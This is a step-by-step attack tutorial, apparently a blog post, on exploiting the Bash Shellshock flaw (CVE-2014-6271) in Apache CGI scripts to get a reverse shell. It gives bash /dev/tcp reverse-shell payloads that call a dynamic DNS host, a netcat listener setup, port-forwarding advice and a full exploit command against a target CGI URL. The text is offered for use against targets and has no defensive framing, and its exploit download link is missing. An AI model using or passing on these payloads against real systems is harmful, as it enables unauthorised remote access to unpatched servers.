Today, we’re going to exploit the Bash Shellshock vulnerability (CVE-2014-6271) and get a reverse shell, pointing the callback at a dynamic DNS hostname instead of a hard-coded IP address so the payload keeps working when your public IP changes. Keep in mind that a dynamic DNS name does not hide your address: the target resolves the name and connects straight to your IP.
Who is vulnerable to Shellshock?:
Any system whose bash is unpatched for CVE-2014-6271 and lets a remote user set environment variables for a bash process. The classic case is Apache mod_cgi running a bash CGI script: request headers such as User-Agent are exported to the script as environment variables (HTTP_USER_AGENT), and a vulnerable bash keeps parsing past the "() { :; }" function body and executes whatever follows it.
3- Download the exploit for Shellshock from here
noip Domain for the callback address:
1- Visit noip.com and register an account.
2- Log into your account, open Manage Hosts, and add a free hostname that points at your public IP.
The hostname gives your changing public IP a stable name, so the reverse-shell command below does not break when your ISP reassigns your address. It does not anonymise you: the victim resolves the hostname and connects directly to your IP, which will show up in its connection logs.
/dev/tcp Linux Native Reverse Shell:
We will use bash's /dev/tcp pseudo-device for the reverse shell because it needs nothing but bash on the target: no netcat, python or perl. Note that /dev/tcp is a feature of bash itself, not a kernel device, so the command must be run by bash (which it is here, since Shellshock only fires inside bash). Use either your noip hostname or your raw public IP; the port must match the netcat listener started below:
/bin/bash -i >& /dev/tcp/logon.myftp.org/5555 0>&1
/bin/bash -i >& /dev/tcp/UR_PUBLIC_IP/5555 0>&1
NOTE: if your machine is behind NAT, forward TCP port 5555 on your router to the LAN IP of the machine running the listener, otherwise the callback never reaches you.
Verification of vulnerable victim:
Now run the following command to check the target with the exploit.
If you see "command sent to server", the server accepted the request, but with this exploit the command's output is not carried back in the HTTP response, so the response alone does not tell you whether the command ran. That is why the next step uses an out-of-band reverse shell: a connection arriving at your listener is the proof of execution.
Netcat Reverse Shell Handler:
Now we need netcat listening on a port so that we can catch the reverse shell. Start a listener on your system with this command (the port must be the one in your payload and in your port forward):
nc -lp 5555 -vv
-vv increases verbosity so you see the incoming connection details
-l tells netcat to listen instead of connecting out
-p sets the port on which we want to listen
Now we are all set; run the following command and wait until you receive a reverse shell on your netcat handler (the payload must be in straight quotes, not typographic ones, or the shell will mangle it):
php bash_mod_cgi_script.php -u http://targetdomain.com/cgi-bin/wslb.sh -c "/bin/bash -i >& /dev/tcp/logon.myftp.org/5555 0>&1"